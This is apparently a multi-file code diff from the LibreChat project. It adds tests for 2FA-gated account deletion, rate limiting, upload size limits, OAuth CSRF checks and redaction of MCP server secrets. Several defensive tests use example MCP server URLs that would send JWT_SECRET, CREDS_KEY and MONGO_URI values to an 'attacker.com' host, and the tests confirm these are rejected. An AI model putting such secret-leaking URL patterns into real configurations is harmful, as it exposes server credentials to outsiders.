Group: { updateMany: jest.fn() },
Token: { deleteMany: jest.fn() },
User: {},
}));
jest.mock('~/server/services/PluginService', () => ({
updateUserPluginAuth: jest.fn(),
deleteUserPluginAuth: (...args) => mockDeleteUserPluginAuth(...args),
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
}));
jest.mock('~/server/services/AuthService', () => ({
verifyEmail: jest.fn(),
resendVerificationEmail: jest.fn(),
}));
jest.mock('~/config', () => ({
getMCPManager: jest.fn(),
getFlowStateManager: jest.fn(),
getMCPServersRegistry: jest.fn(),
}));
jest.mock('~/server/services/Config/getCachedTools', () => ({
invalidateCachedTools: jest.fn(),
}));
jest.mock('~/server/services/Files/S3/crud', () => ({
needsRefresh: jest.fn(),
getNewS3URL: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
processDeleteRequest: (...args) => mockProcessDeleteRequest(...args),
}));
jest.mock('~/server/services/Config', () => ({
getAppConfig: jest.fn(),
}));
jest.mock('~/models/ToolCall', () => ({
deleteToolCalls: (...args) => mockDeleteToolCalls(...args),
}));
jest.mock('~/models/Prompt', () => ({
deleteUserPrompts: (...args) => mockDeleteUserPrompts(...args),
}));
jest.mock('~/models/Agent', () => ({
deleteUserAgents: (...args) => mockDeleteUserAgents(...args),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(),
}));
const { deleteUserController } = require('~/server/controllers/UserController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
res.send = jest.fn().mockReturnValue(res);
return res;
}
function stubDeletionMocks() {
mockDeleteMessages.mockResolvedValue();
mockDeleteAllUserSessions.mockResolvedValue();
mockDeleteUserKey.mockResolvedValue();
mockDeletePresets.mockResolvedValue();
mockDeleteConvos.mockResolvedValue();
mockDeleteUserPluginAuth.mockResolvedValue();
mockDeleteUserById.mockResolvedValue();
mockDeleteAllSharedLinks.mockResolvedValue();
mockGetFiles.mockResolvedValue([]);
mockProcessDeleteRequest.mockResolvedValue();
mockDeleteFiles.mockResolvedValue();
mockDeleteToolCalls.mockResolvedValue();
mockDeleteUserAgents.mockResolvedValue();
mockDeleteUserPrompts.mockResolvedValue();
}
beforeEach(() => {
jest.clearAllMocks();
stubDeletionMocks();
});
describe('deleteUserController - 2FA enforcement', () => {
it('proceeds with deletion when 2FA is not enabled', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
});
it('proceeds with deletion when user has no 2FA record', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
});
it('returns error when 2FA is enabled and verification fails with 400', async () => {
const req = { user: { id: 'user1', _id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid TOTP token provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: 'wrong',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid backup code provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [],
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { backupCode: 'bad-code' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'bad-code',
});
expect(res.status).toHaveBeenCalledWith(401);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('deletes account when valid TOTP token provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { token: '123456' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
it('deletes account when valid backup code provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [{ codeHash: 'h1', used: false }],
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { backupCode: 'valid-code' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'valid-code',
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
});

View file

@ -1172,7 +1172,11 @@ class AgentClient extends BaseClient {
} }
} }
/** Anthropic Claude models use a distinct BPE tokenizer; all others default to o200k_base. */
getEncoding() { getEncoding() {
if (this.model && this.model.toLowerCase().includes('claude')) {
return 'claude';
}
return 'o200k_base'; return 'o200k_base';
} }

View file

@ -7,9 +7,11 @@
*/ */
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { const {
MCPErrorCodes,
redactServerSecrets,
redactAllServerSecrets,
isMCPDomainNotAllowedError, isMCPDomainNotAllowedError,
isMCPInspectionFailedError, isMCPInspectionFailedError,
MCPErrorCodes,
} = require('@librechat/api'); } = require('@librechat/api');
const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider'); const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider');
const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config'); const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config');
@ -181,10 +183,8 @@ const getMCPServersList = async (req, res) => {
return res.status(401).json({ message: 'Unauthorized' }); return res.status(401).json({ message: 'Unauthorized' });
} }
// 2. Get all server configs from registry (YAML + DB)
const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId); const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId);
return res.json(redactAllServerSecrets(serverConfigs));
return res.json(serverConfigs);
} catch (error) { } catch (error) {
logger.error('[getMCPServersList]', error); logger.error('[getMCPServersList]', error);
res.status(500).json({ error: error.message }); res.status(500).json({ error: error.message });
@ -215,7 +215,7 @@ const createMCPServerController = async (req, res) => {
); );
res.status(201).json({ res.status(201).json({
serverName: result.serverName, serverName: result.serverName,
...result.config, ...redactServerSecrets(result.config),
}); });
} catch (error) { } catch (error) {
logger.error('[createMCPServer]', error); logger.error('[createMCPServer]', error);
@ -243,7 +243,7 @@ const getMCPServerById = async (req, res) => {
return res.status(404).json({ message: 'MCP server not found' }); return res.status(404).json({ message: 'MCP server not found' });
} }
res.status(200).json(parsedConfig); res.status(200).json(redactServerSecrets(parsedConfig));
} catch (error) { } catch (error) {
logger.error('[getMCPServerById]', error); logger.error('[getMCPServerById]', error);
res.status(500).json({ message: error.message }); res.status(500).json({ message: error.message });
@ -274,7 +274,7 @@ const updateMCPServerController = async (req, res) => {
userId, userId,
); );
res.status(200).json(parsedConfig); res.status(200).json(redactServerSecrets(parsedConfig));
} catch (error) { } catch (error) {
logger.error('[updateMCPServer]', error); logger.error('[updateMCPServer]', error);
const mcpErrorResponse = handleMCPError(error, res); const mcpErrorResponse = handleMCPError(error, res);

View file

@ -48,7 +48,7 @@ const createForkHandler = (ip = true) => {
}; };
await logViolation(req, res, type, errorMessage, forkViolationScore); await logViolation(req, res, type, errorMessage, forkViolationScore);
res.status(429).json({ message: 'Too many conversation fork requests. Try again later' }); res.status(429).json({ message: 'Too many requests. Try again later' });
}; };
}; };

View file

@ -0,0 +1,93 @@
module.exports = {
agents: () => ({ sleep: jest.fn() }),
api: (overrides = {}) => ({
isEnabled: jest.fn(),
resolveImportMaxFileSize: jest.fn(() => 262144000),
createAxiosInstance: jest.fn(() => ({
get: jest.fn(),
post: jest.fn(),
put: jest.fn(),
delete: jest.fn(),
})),
logAxiosError: jest.fn(),
...overrides,
}),
dataSchemas: () => ({
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
createModels: jest.fn(() => ({
User: {},
Conversation: {},
Message: {},
SharedLink: {},
})),
}),
dataProvider: (overrides = {}) => ({
CacheKeys: { GEN_TITLE: 'GEN_TITLE' },
EModelEndpoint: {
azureAssistants: 'azureAssistants',
assistants: 'assistants',
},
...overrides,
}),
conversationModel: () => ({
getConvosByCursor: jest.fn(),
getConvo: jest.fn(),
deleteConvos: jest.fn(),
saveConvo: jest.fn(),
}),
toolCallModel: () => ({ deleteToolCalls: jest.fn() }),
sharedModels: () => ({
deleteAllSharedLinks: jest.fn(),
deleteConvoSharedLink: jest.fn(),
}),
requireJwtAuth: () => (req, res, next) => next(),
middlewarePassthrough: () => ({
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters: jest.fn(() => ({
forkIpLimiter: (req, res, next) => next(),
forkUserLimiter: (req, res, next) => next(),
})),
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
}),
forkUtils: () => ({
forkConversation: jest.fn(),
duplicateConversation: jest.fn(),
}),
importUtils: () => ({ importConversations: jest.fn() }),
logStores: () => jest.fn(),
multerSetup: () => ({
storage: {},
importFileFilter: jest.fn(),
}),
multerLib: () =>
jest.fn(() => ({
single: jest.fn(() => (req, res, next) => {
req.file = { path: '/tmp/test-file.json' };
next();
}),
})),
assistantEndpoint: () => ({ initializeClient: jest.fn() }),
};

View file

@ -0,0 +1,135 @@
const express = require('express');
const request = require('supertest');
const MOCKS = '../__test-utils__/convos-route-mocks';
jest.mock('@librechat/agents', () => require(MOCKS).agents());
jest.mock('@librechat/api', () => require(MOCKS).api({ limiterCache: jest.fn(() => undefined) }));
jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
jest.mock('librechat-data-provider', () =>
require(MOCKS).dataProvider({ ViolationTypes: { FILE_UPLOAD_LIMIT: 'file_upload_limit' } }),
);
jest.mock('~/cache/logViolation', () => jest.fn().mockResolvedValue(undefined));
jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
jest.mock('~/models', () => require(MOCKS).sharedModels());
jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
jest.mock('~/server/middleware', () => {
const { createForkLimiters } = jest.requireActual('~/server/middleware/limiters/forkLimiters');
return {
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters,
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
};
});
jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
jest.mock('multer', () => require(MOCKS).multerLib());
jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
describe('POST /api/convos/duplicate - Rate Limiting', () => {
let app;
let duplicateConversation;
const savedEnv = {};
beforeAll(() => {
savedEnv.FORK_USER_MAX = process.env.FORK_USER_MAX;
savedEnv.FORK_USER_WINDOW = process.env.FORK_USER_WINDOW;
savedEnv.FORK_IP_MAX = process.env.FORK_IP_MAX;
savedEnv.FORK_IP_WINDOW = process.env.FORK_IP_WINDOW;
});
afterAll(() => {
for (const key of Object.keys(savedEnv)) {
if (savedEnv[key] === undefined) {
delete process.env[key];
} else {
process.env[key] = savedEnv[key];
}
}
});
const setupApp = () => {
jest.clearAllMocks();
jest.isolateModules(() => {
const convosRouter = require('../convos');
({ duplicateConversation } = require('~/server/utils/import/fork'));
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: 'rate-limit-test-user' };
next();
});
app.use('/api/convos', convosRouter);
});
duplicateConversation.mockResolvedValue({
conversation: { conversationId: 'duplicated-conv' },
});
};
describe('user limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '2';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '100';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the user rate limit', async () => {
const userMax = parseInt(process.env.FORK_USER_MAX, 10);
for (let i = 0; i < userMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
describe('IP limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '100';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '2';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the IP rate limit', async () => {
const ipMax = parseInt(process.env.FORK_IP_MAX, 10);
for (let i = 0; i < ipMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
});

View file

@ -0,0 +1,98 @@
const express = require('express');
const request = require('supertest');
const multer = require('multer');
const importFileFilter = (req, file, cb) => {
if (file.mimetype === 'application/json') {
cb(null, true);
} else {
cb(new Error('Only JSON files are allowed'), false);
}
};
/** Proxy app that mirrors the production multer + error-handling pattern */
function createImportApp(fileSize) {
const app = express();
const upload = multer({
storage: multer.memoryStorage(),
fileFilter: importFileFilter,
limits: { fileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
app.post('/import', handleUpload, (req, res) => {
res.status(201).json({ message: 'success', size: req.file.size });
});
app.use((err, _req, res, _next) => {
res.status(400).json({ error: err.message });
});
return app;
}
describe('Conversation Import - Multer File Size Limits', () => {
describe('multer rejects files exceeding the configured limit', () => {
it('returns 413 for files larger than the limit', async () => {
const limit = 1024;
const app = createImportApp(limit);
const oversized = Buffer.alloc(limit + 512, 'x');
const res = await request(app)
.post('/import')
.attach('file', oversized, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
expect(res.body.message).toBe('File exceeds the maximum allowed size');
});
it('accepts files within the limit', async () => {
const limit = 4096;
const app = createImportApp(limit);
const valid = Buffer.from(JSON.stringify({ title: 'test' }));
const res = await request(app)
.post('/import')
.attach('file', valid, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
expect(res.body.message).toBe('success');
});
it('rejects at the exact boundary (limit + 1 byte)', async () => {
const limit = 512;
const app = createImportApp(limit);
const boundary = Buffer.alloc(limit + 1, 'a');
const res = await request(app)
.post('/import')
.attach('file', boundary, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
});
it('accepts a file just under the limit', async () => {
const limit = 512;
const app = createImportApp(limit);
const underLimit = Buffer.alloc(limit - 1, 'b');
const res = await request(app)
.post('/import')
.attach('file', underLimit, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
});
});
});

View file

@ -1,109 +1,24 @@
const express = require('express'); const express = require('express');
const request = require('supertest'); const request = require('supertest');
jest.mock('@librechat/agents', () => ({ const MOCKS = '../__test-utils__/convos-route-mocks';
sleep: jest.fn(),
}));
jest.mock('@librechat/api', () => ({ jest.mock('@librechat/agents', () => require(MOCKS).agents());
isEnabled: jest.fn(), jest.mock('@librechat/api', () => require(MOCKS).api());
createAxiosInstance: jest.fn(() => ({ jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
get: jest.fn(), jest.mock('librechat-data-provider', () => require(MOCKS).dataProvider());
post: jest.fn(), jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
put: jest.fn(), jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
delete: jest.fn(), jest.mock('~/models', () => require(MOCKS).sharedModels());
})), jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
logAxiosError: jest.fn(), jest.mock('~/server/middleware', () => require(MOCKS).middlewarePassthrough());
})); jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
jest.mock('@librechat/data-schemas', () => ({ jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
logger: { jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
debug: jest.fn(), jest.mock('multer', () => require(MOCKS).multerLib());
info: jest.fn(), jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
warn: jest.fn(), jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
error: jest.fn(),
},
createModels: jest.fn(() => ({
User: {},
Conversation: {},
Message: {},
SharedLink: {},
})),
}));
jest.mock('~/models/Conversation', () => ({
getConvosByCursor: jest.fn(),
getConvo: jest.fn(),
deleteConvos: jest.fn(),
saveConvo: jest.fn(),
}));
jest.mock('~/models/ToolCall', () => ({
deleteToolCalls: jest.fn(),
}));
jest.mock('~/models', () => ({
deleteAllSharedLinks: jest.fn(),
deleteConvoSharedLink: jest.fn(),
}));
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
jest.mock('~/server/middleware', () => ({
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters: jest.fn(() => ({
forkIpLimiter: (req, res, next) => next(),
forkUserLimiter: (req, res, next) => next(),
})),
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
}));
jest.mock('~/server/utils/import/fork', () => ({
forkConversation: jest.fn(),
duplicateConversation: jest.fn(),
}));
jest.mock('~/server/utils/import', () => ({
importConversations: jest.fn(),
}));
jest.mock('~/cache/getLogStores', () => jest.fn());
jest.mock('~/server/routes/files/multer', () => ({
storage: {},
importFileFilter: jest.fn(),
}));
jest.mock('multer', () => {
return jest.fn(() => ({
single: jest.fn(() => (req, res, next) => {
req.file = { path: '/tmp/test-file.json' };
next();
}),
}));
});
jest.mock('librechat-data-provider', () => ({
CacheKeys: {
GEN_TITLE: 'GEN_TITLE',
},
EModelEndpoint: {
azureAssistants: 'azureAssistants',
assistants: 'assistants',
},
}));
jest.mock('~/server/services/Endpoints/azureAssistants', () => ({
initializeClient: jest.fn(),
}));
jest.mock('~/server/services/Endpoints/assistants', () => ({
initializeClient: jest.fn(),
}));
describe('Convos Routes', () => { describe('Convos Routes', () => {
let app; let app;

View file

@ -32,6 +32,9 @@ jest.mock('@librechat/api', () => {
getFlowState: jest.fn(), getFlowState: jest.fn(),
completeOAuthFlow: jest.fn(), completeOAuthFlow: jest.fn(),
generateFlowId: jest.fn(), generateFlowId: jest.fn(),
resolveStateToFlowId: jest.fn(async (state) => state),
storeStateMapping: jest.fn(),
deleteStateMapping: jest.fn(),
}, },
MCPTokenStorage: { MCPTokenStorage: {
storeTokens: jest.fn(), storeTokens: jest.fn(),
@ -180,7 +183,10 @@ describe('MCP Routes', () => {
MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({ MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({
authorizationUrl: 'https://oauth.example.com/auth', authorizationUrl: 'https://oauth.example.com/auth',
flowId: 'test-user-id:test-server', flowId: 'test-user-id:test-server',
flowMetadata: { state: 'random-state-value' },
}); });
MCPOAuthHandler.storeStateMapping.mockResolvedValue();
mockFlowManager.initFlow = jest.fn().mockResolvedValue();
const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({ const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({
userId: 'test-user-id', userId: 'test-user-id',
@ -367,6 +373,121 @@ describe('MCP Routes', () => {
expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`); expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`);
}); });
describe('CSRF fallback via active PENDING flow', () => {
it('should proceed when a fresh PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now(),
}),
completeFlow: jest.fn().mockResolvedValue(true),
deleteFlow: jest.fn().mockResolvedValue(true),
};
const mockFlowState = {
serverName: 'test-server',
userId: 'test-user-id',
metadata: {},
clientInfo: {},
codeVerifier: 'test-verifier',
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
MCPOAuthHandler.getFlowState.mockResolvedValue(mockFlowState);
MCPOAuthHandler.completeOAuthFlow.mockResolvedValue({
access_token: 'test-token',
});
MCPTokenStorage.storeTokens.mockResolvedValue();
mockRegistryInstance.getServerConfig.mockResolvedValue({});
const mockMcpManager = {
getUserConnection: jest.fn().mockResolvedValue({
fetchTools: jest.fn().mockResolvedValue([]),
}),
};
require('~/config').getMCPManager.mockReturnValue(mockMcpManager);
require('~/config').getOAuthReconnectionManager.mockReturnValue({
clearReconnection: jest.fn(),
});
require('~/server/services/Config/mcp').updateMCPServerTools.mockResolvedValue();
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toContain(`${basePath}/oauth/success`);
});
it('should reject when no PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue(null),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
it('should reject when only a COMPLETED flow exists (not PENDING)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'COMPLETED',
createdAt: Date.now(),
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
it('should reject when PENDING flow is stale (older than PENDING_STALE_MS)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now() - 3 * 60 * 1000,
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
});
it('should handle OAuth callback successfully', async () => { it('should handle OAuth callback successfully', async () => {
// mockRegistryInstance is defined at the top of the file // mockRegistryInstance is defined at the top of the file
const mockFlowManager = { const mockFlowManager = {
@ -1572,12 +1693,14 @@ describe('MCP Routes', () => {
it('should return all server configs for authenticated user', async () => { it('should return all server configs for authenticated user', async () => {
const mockServerConfigs = { const mockServerConfigs = {
'server-1': { 'server-1': {
endpoint: 'http://server1.com', type: 'sse',
name: 'Server 1', url: 'http://server1.com/sse',
title: 'Server 1',
}, },
'server-2': { 'server-2': {
endpoint: 'http://server2.com', type: 'sse',
name: 'Server 2', url: 'http://server2.com/sse',
title: 'Server 2',
}, },
}; };
@ -1586,7 +1709,18 @@ describe('MCP Routes', () => {
const response = await request(app).get('/api/mcp/servers'); const response = await request(app).get('/api/mcp/servers');
expect(response.status).toBe(200); expect(response.status).toBe(200);
expect(response.body).toEqual(mockServerConfigs); expect(response.body['server-1']).toMatchObject({
type: 'sse',
url: 'http://server1.com/sse',
title: 'Server 1',
});
expect(response.body['server-2']).toMatchObject({
type: 'sse',
url: 'http://server2.com/sse',
title: 'Server 2',
});
expect(response.body['server-1'].headers).toBeUndefined();
expect(response.body['server-2'].headers).toBeUndefined();
expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id'); expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id');
}); });
@ -1641,10 +1775,10 @@ describe('MCP Routes', () => {
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig }); const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
expect(response.status).toBe(201); expect(response.status).toBe(201);
expect(response.body).toEqual({ expect(response.body.serverName).toBe('test-sse-server');
serverName: 'test-sse-server', expect(response.body.type).toBe('sse');
...validConfig, expect(response.body.url).toBe('https://mcp-server.example.com/sse');
}); expect(response.body.title).toBe('Test SSE Server');
expect(mockRegistryInstance.addServer).toHaveBeenCalledWith( expect(mockRegistryInstance.addServer).toHaveBeenCalledWith(
'temp_server_name', 'temp_server_name',
expect.objectContaining({ expect.objectContaining({
@ -1698,6 +1832,78 @@ describe('MCP Routes', () => {
expect(response.body.message).toBe('Invalid configuration'); expect(response.body.message).toBe('Invalid configuration');
}); });
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}&iv=${CREDS_IV}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should redact secrets from create response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Test Server',
};
mockRegistryInstance.addServer.mockResolvedValue({
serverName: 'test-server',
config: {
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' },
oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' },
headers: { Authorization: 'Bearer leaked-token' },
},
});
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
expect(response.status).toBe(201);
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.headers).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_id).toBe('cid');
});
it('should return 500 when registry throws error', async () => { it('should return 500 when registry throws error', async () => {
const validConfig = { const validConfig = {
type: 'sse', type: 'sse',
@ -1727,7 +1933,9 @@ describe('MCP Routes', () => {
const response = await request(app).get('/api/mcp/servers/test-server'); const response = await request(app).get('/api/mcp/servers/test-server');
expect(response.status).toBe(200); expect(response.status).toBe(200);
expect(response.body).toEqual(mockConfig); expect(response.body.type).toBe('sse');
expect(response.body.url).toBe('https://mcp-server.example.com/sse');
expect(response.body.title).toBe('Test Server');
